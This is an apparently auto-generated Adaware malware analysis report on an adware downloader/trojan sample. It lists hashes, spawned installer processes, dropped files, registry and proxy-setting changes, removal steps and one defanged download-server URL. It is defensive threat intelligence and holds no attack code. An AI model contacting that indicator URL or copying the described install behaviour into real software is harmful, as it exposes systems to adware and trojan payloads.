Application.Downloader.RO_325175aa97 – Adaware

not-a-virus:AdWare.Win32.AdLoad.wvar (Kaspersky), Application.Downloader.RO (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 325175aa976eef22d0cc911fbcfdef64

SHA1: 9ed52ce5a43dc37a4ffd38d410301f4766774b90

SHA256: bf5cf82787dc628f22f7ab2cd8a01573e1c9e56d18bd7a46295a3787da05ba50

SSDeep: 12288:BK2mhAMJ/cPlJHiqQF2qTuxS7R38JK8l924IqPKZ5SRWocW:w2O/GlJHQ1lR38Jpl9XIqYIWDW

Size: 582736 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: Hul

Created at: 2012-06-09 16:19:49

Analyzed on: Windows7 SP1 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884

The Application injects its code into the following process(es):

Setup__2140_il2.exe:3512

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process Setup__2140_il2.exe:2308 makes changes in the file system.

The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)

The process Setup__2140_il2.exe:3512 makes changes in the file system.

The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)

The process sevensetup.exe:3356 makes changes in the file system.

The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)

The Application deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd584D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (0 bytes)

The process %original file name%.exe:3580 makes changes in the file system.

The Application creates and/or writes to the following file(s):

The Application deletes the following file(s):

The process cpSetup.exe:3976 makes changes in the file system.

The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)

The process run-setup.exe:3884 makes changes in the file system.

The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)

The Application deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC40.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp (0 bytes)

Registry activity

The process Setup__2140_il2.exe:2308 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\noesis.beryline]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"

[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following registry key(s):

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
[HKCR\noesis.beryline\CurVer]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
[HKCR\noesis.beryline.1\CLSID]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Programmable]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
[HKCR\noesis.beryline]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
[HKCR\noesis.beryline.1]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process Setup__2140_il2.exe:3512 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\noesis.beryline]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3B 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"

[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"

[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"

[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

The process sevensetup.exe:3356 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3580 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process cpSetup.exe:3976 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479002472"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process 5827498a25abb_ua.exe:2980 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process run-setup.exe:3884 makes changes in the system registry.

The Application creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe,"

Dropped PE files

MD5	File path
a7318ed2c34bd30f5605e0457734826f	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
a5f8399a743ab7f9c88c645c35b1ebb5	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll
aa91653a46d59ef020669de66aa1fb31	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884
Delete the original Application file.
Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	74526	74752	4.54396	a8692f5ba740240ef0f9a827376f76f9
.rdata	81920	7445	7680	3.46159	d4f36accffde0bf520f52486679ccf0d
.data	90112	96036	512	2.46008	b6c7edb5b7fec47a37a622cc5d71f3f4
.CRT	188416	32	512	0.273198	439411041ee0b8261668525c5c132cd9
.rsrc	192512	16656	16896	3.23905	aa3a7d7ff24a928d00c7a73daacad998

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 567
01d8f21bdcf3f33cfd44b21cda45bbe1
c9ab4e6c1cfc8ff69ab509756fb4bbb2
a93831bd552da93e3bc3af481883f0cb
8512a38a32d856c43d3d53d1298cdf48
27a2aefa7a8141c7e4d47e4e4e4912dd
62535b8e1ac59d327110d422df7027bc
79f46ad15df03ce32082a5b77e5e8484
19154cb115d8d2adce3b82459253bbb3
1ad22ffca5f98db241175ce6612e1c6c
77653dae69494148cf58389a89a9bd40
9663e05c1cb81a47db70ac43ebb824e1
5e2e21eb1cccabe74a231dc8ee7e45ab
a08d1145184718c8cfb3e674cb51bf37
7ec5648ba6020db188003cab70553f79
b1220d6c3e4fc06ac894d65353fb84e6
b0516e031ff5e44241d3bd16b28983d8
64989f7c46d4103fa833fe61c529a1bf
62379b050ee5ee24b5710d77976e4a4c
e47b3680df663a409ff27e7892659d6a
5094e2b5502bb3eb161183ccdd26bee5
d8616b984b03d23f2ddad2ace1e6fcc9
bb3461f9ff7218951e59c6c7d5e18f65
f6794b812107e8db90b8a9adbc3a19d6
babe8174d9e14bddc4572ed8fc3fef02
0c153ff4df276bb5694854186f48e695

Network Activity

URLs

URL	IP
hxxp://52.222.174.245/get.php?ses=429155916441231936
